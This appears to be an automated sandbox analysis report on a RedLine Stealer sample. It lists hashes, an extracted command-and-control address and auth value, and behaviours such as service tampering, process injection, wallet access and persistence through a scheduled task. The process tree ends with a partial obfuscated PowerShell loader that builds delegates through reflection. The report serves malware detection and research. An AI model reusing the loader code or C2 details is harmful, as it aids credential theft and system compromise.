Analysis
-
max time kernel
150s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
28/01/2023, 19:33
Static task
static1
Behavioral task
behavioral1
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
Resource
win10v2004-20220812-en
General
-
Target
1d678410484e34165adb652f7e86a2b5cae5f58d.exe
-
Size
361KB
-
MD5
18852c1659b6641a1f4eeacf6ce6bb8d
-
SHA1
1d678410484e34165adb652f7e86a2b5cae5f58d
-
SHA256
34efda61716ff1db7297813317e194d4eaa74ae5209810ef6045aabab2af3179
-
SHA512
86295df5931e4673fc6579c1d6425040dbf44c6fbd5c19a35228f1c9f8d4917944c8ff020998d4504853398e7640664bf10c275835b1bfa7a236a073ed518b74
-
SSDEEP
6144:lUNamFD8LPUsNuwibRhinAoCRH+SXm+iMvOfcLpp0AdgqMGjEAOe75wBNEj+nc:lUFD8LPaw2RhinATReSXmPMvBBdqZBNU
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4568-174-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 2944 created 3216 2944 WerFault.exe 132 PID 4392 created 2908 4392 WerFault.exe 135 -
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 3316 created 3032 3316 SmartDefRun.exe 32 PID 3316 created 3032 3316 SmartDefRun.exe 32 PID 3316 created 3032 3316 SmartDefRun.exe 32 PID 3316 created 3032 3316 SmartDefRun.exe 32 PID 4536 created 588 4536 powershell.EXE 6 PID 3768 created 3216 3768 svchost.exe 132 PID 3768 created 2908 3768 svchost.exe 135 -
Blocklisted process makes network request 1 IoCs
flow pid Process 18 1876 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 3096 C4Loader.exe 4800 new2.exe 3296 SysApp.exe 3316 SmartDefRun.exe 1892 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1180 set thread context of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 4800 set thread context of 4568 4800 new2.exe 97 PID 3316 set thread context of 1940 3316 SmartDefRun.exe 121 PID 4536 set thread context of 4920 4536 powershell.EXE 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1124 sc.exe 1412 sc.exe 4932 sc.exe 3476 sc.exe 4864 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 2360 1180 WerFault.exe 79 2728 4800 WerFault.exe 93 4696 4204 WerFault.exe 60 3600 3284 WerFault.exe 31 1156 3216 WerFault.exe 132 3480 2908 WerFault.exe 135 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3756 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1876 powershell.exe 1876 powershell.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 3296 SysApp.exe 4568 vbc.exe 3316 SmartDefRun.exe 3316 SmartDefRun.exe 4164 powershell.exe 4164 powershell.exe 3316 SmartDefRun.exe 3316 SmartDefRun.exe 3316 SmartDefRun.exe 3316 SmartDefRun.exe 1780 powershell.exe 1780 powershell.exe 3316 SmartDefRun.exe 3316 SmartDefRun.exe 4676 powershell.EXE 4536 powershell.EXE 4536 powershell.EXE 4676 powershell.EXE 4536 powershell.EXE 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4696 WerFault.exe 4696 WerFault.exe 4920 dllhost.exe 4920 dllhost.exe 3600 WerFault.exe 3600 WerFault.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 4920 dllhost.exe 3768 svchost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 4568 vbc.exe Token: SeDebugPrivilege 4164 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeIncreaseQuotaPrivilege 1780 powershell.exe Token: SeSecurityPrivilege 1780 powershell.exe Token: SeTakeOwnershipPrivilege 1780 powershell.exe Token: SeLoadDriverPrivilege 1780 powershell.exe Token: SeSystemProfilePrivilege 1780 powershell.exe Token: SeSystemtimePrivilege 1780 powershell.exe Token: SeProfSingleProcessPrivilege 1780 powershell.exe Token: SeIncBasePriorityPrivilege 1780 powershell.exe Token: SeCreatePagefilePrivilege 1780 powershell.exe Token: SeBackupPrivilege 1780 powershell.exe Token: SeRestorePrivilege 1780 powershell.exe Token: SeShutdownPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeSystemEnvironmentPrivilege 1780 powershell.exe Token: SeRemoteShutdownPrivilege 1780 powershell.exe Token: SeUndockPrivilege 1780 powershell.exe Token: SeManageVolumePrivilege 1780 powershell.exe Token: 33 1780 powershell.exe Token: 34 1780 powershell.exe Token: 35 1780 powershell.exe Token: 36 1780 powershell.exe Token: SeIncreaseQuotaPrivilege 1780 powershell.exe Token: SeSecurityPrivilege 1780 powershell.exe Token: SeTakeOwnershipPrivilege 1780 powershell.exe Token: SeLoadDriverPrivilege 1780 powershell.exe Token: SeSystemProfilePrivilege 1780 powershell.exe Token: SeSystemtimePrivilege 1780 powershell.exe Token: SeProfSingleProcessPrivilege 1780 powershell.exe Token: SeIncBasePriorityPrivilege 1780 powershell.exe Token: SeCreatePagefilePrivilege 1780 powershell.exe Token: SeBackupPrivilege 1780 powershell.exe Token: SeRestorePrivilege 1780 powershell.exe Token: SeShutdownPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeSystemEnvironmentPrivilege 1780 powershell.exe Token: SeRemoteShutdownPrivilege 1780 powershell.exe Token: SeUndockPrivilege 1780 powershell.exe Token: SeManageVolumePrivilege 1780 powershell.exe Token: 33 1780 powershell.exe Token: 34 1780 powershell.exe Token: 35 1780 powershell.exe Token: 36 1780 powershell.exe Token: SeIncreaseQuotaPrivilege 1780 powershell.exe Token: SeSecurityPrivilege 1780 powershell.exe Token: SeTakeOwnershipPrivilege 1780 powershell.exe Token: SeLoadDriverPrivilege 1780 powershell.exe Token: SeSystemProfilePrivilege 1780 powershell.exe Token: SeSystemtimePrivilege 1780 powershell.exe Token: SeProfSingleProcessPrivilege 1780 powershell.exe Token: SeIncBasePriorityPrivilege 1780 powershell.exe Token: SeCreatePagefilePrivilege 1780 powershell.exe Token: SeBackupPrivilege 1780 powershell.exe Token: SeRestorePrivilege 1780 powershell.exe Token: SeShutdownPrivilege 1780 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe Token: SeSystemEnvironmentPrivilege 1780 powershell.exe Token: SeRemoteShutdownPrivilege 1780 powershell.exe Token: SeUndockPrivilege 1780 powershell.exe Token: SeManageVolumePrivilege 1780 powershell.exe Token: 33 1780 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1180 wrote to memory of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 1180 wrote to memory of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 1180 wrote to memory of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 1180 wrote to memory of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 1180 wrote to memory of 1604 1180 1d678410484e34165adb652f7e86a2b5cae5f58d.exe 81 PID 1604 wrote to memory of 1876 1604 vbc.exe 85 PID 1604 wrote to memory of 1876 1604 vbc.exe 85 PID 1604 wrote to memory of 1876 1604 vbc.exe 85 PID 1876 wrote to memory of 3096 1876 powershell.exe 92 PID 1876 wrote to memory of 3096 1876 powershell.exe 92 PID 1876 wrote to memory of 3096 1876 powershell.exe 92 PID 1876 wrote to memory of 4800 1876 powershell.exe 93 PID 1876 wrote to memory of 4800 1876 powershell.exe 93 PID 1876 wrote to memory of 4800 1876 powershell.exe 93 PID 1876 wrote to memory of 3296 1876 powershell.exe 95 PID 1876 wrote to memory of 3296 1876 powershell.exe 95 PID 1876 wrote to memory of 3296 1876 powershell.exe 95 PID 1876 wrote to memory of 3316 1876 powershell.exe 96 PID 1876 wrote to memory of 3316 1876 powershell.exe 96 PID 4800 wrote to memory of 4568 4800 new2.exe 97 PID 4800 wrote to memory of 4568 4800 new2.exe 97 PID 4800 wrote to memory of 4568 4800 new2.exe 97 PID 4800 wrote to memory of 4568 4800 new2.exe 97 PID 4800 wrote to memory of 4568 4800 new2.exe 97 PID 3172 wrote to memory of 1124 3172 cmd.exe 111 PID 3172 wrote to memory of 1124 3172 cmd.exe 111 PID 3172 wrote to memory of 1412 3172 cmd.exe 112 PID 3172 wrote to memory of 1412 3172 cmd.exe 112 PID 3172 wrote to memory of 4932 3172 cmd.exe 113 PID 3172 wrote to memory of 4932 3172 cmd.exe 113 PID 3172 wrote to memory of 3476 3172 cmd.exe 114 PID 3172 wrote to memory of 3476 3172 cmd.exe 114 PID 3172 wrote to memory of 4864 3172 cmd.exe 115 PID 3172 wrote to memory of 4864 3172 cmd.exe 115 PID 3172 wrote to memory of 4124 3172 cmd.exe 116 PID 3172 wrote to memory of 4124 3172 cmd.exe 116 PID 3172 wrote to memory of 548 3172 cmd.exe 117 PID 3172 wrote to memory of 548 3172 cmd.exe 117 PID 3172 wrote to memory of 4820 3172 cmd.exe 118 PID 3172 wrote to memory of 4820 3172 cmd.exe 118 PID 3172 wrote to memory of 4632 3172 cmd.exe 119 PID 3172 wrote to memory of 4632 3172 cmd.exe 119 PID 3172 wrote to memory of 3432 3172 cmd.exe 120 PID 3172 wrote to memory of 3432 3172 cmd.exe 120 PID 3316 wrote to memory of 1940 3316 SmartDefRun.exe 121 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4536 wrote to memory of 4920 4536 powershell.EXE 126 PID 4920 wrote to memory of 588 4920 dllhost.exe 6 PID 4920 wrote to memory of 676 4920 dllhost.exe 4 PID 4920 wrote to memory of 956 4920 dllhost.exe 10 PID 4920 wrote to memory of 312 4920 dllhost.exe 11 PID 4920 wrote to memory of 440 4920 dllhost.exe 12 PID 4920 wrote to memory of 868 4920 dllhost.exe 15 PID 4920 wrote to memory of 732 4920 dllhost.exe 17 PID 4920 wrote to memory of 1036 4920 dllhost.exe 21 PID 4920 wrote to memory of 1188 4920 dllhost.exe 20 PID 4920 wrote to memory of 1196 4920 dllhost.exe 19
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:588
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:312
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ad4086f3-73e0-4394-9657-9f4e087405a6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4920
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1228
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1188 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2480
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:MyfbqrCXrmwZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uyDhWjwvEmYXUg,[Parameter(Position=1)][Type]$lZcsLXjbXn)$EwfieYKsAXF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+'l'+[Char](101)+''+[Char](99)+'te'+[Char](100)+''+[Char](68)+'e'+'l'+'eg'+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+'e'+'','Cl'+[Char](97)+'ss'+','+'P'+'u'+'b'+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+'d'+','+[Char](65)+''+'n'+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+'u'+'to'+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$EwfieYKsAXF.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$uyDhWjwvEmYXUg).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');$EwfieYKsAXF.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+'N'+''+[Char](101)+'w'+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$lZcsLXjbXn,$uyDhWjwvEmYXUg).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+','+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output 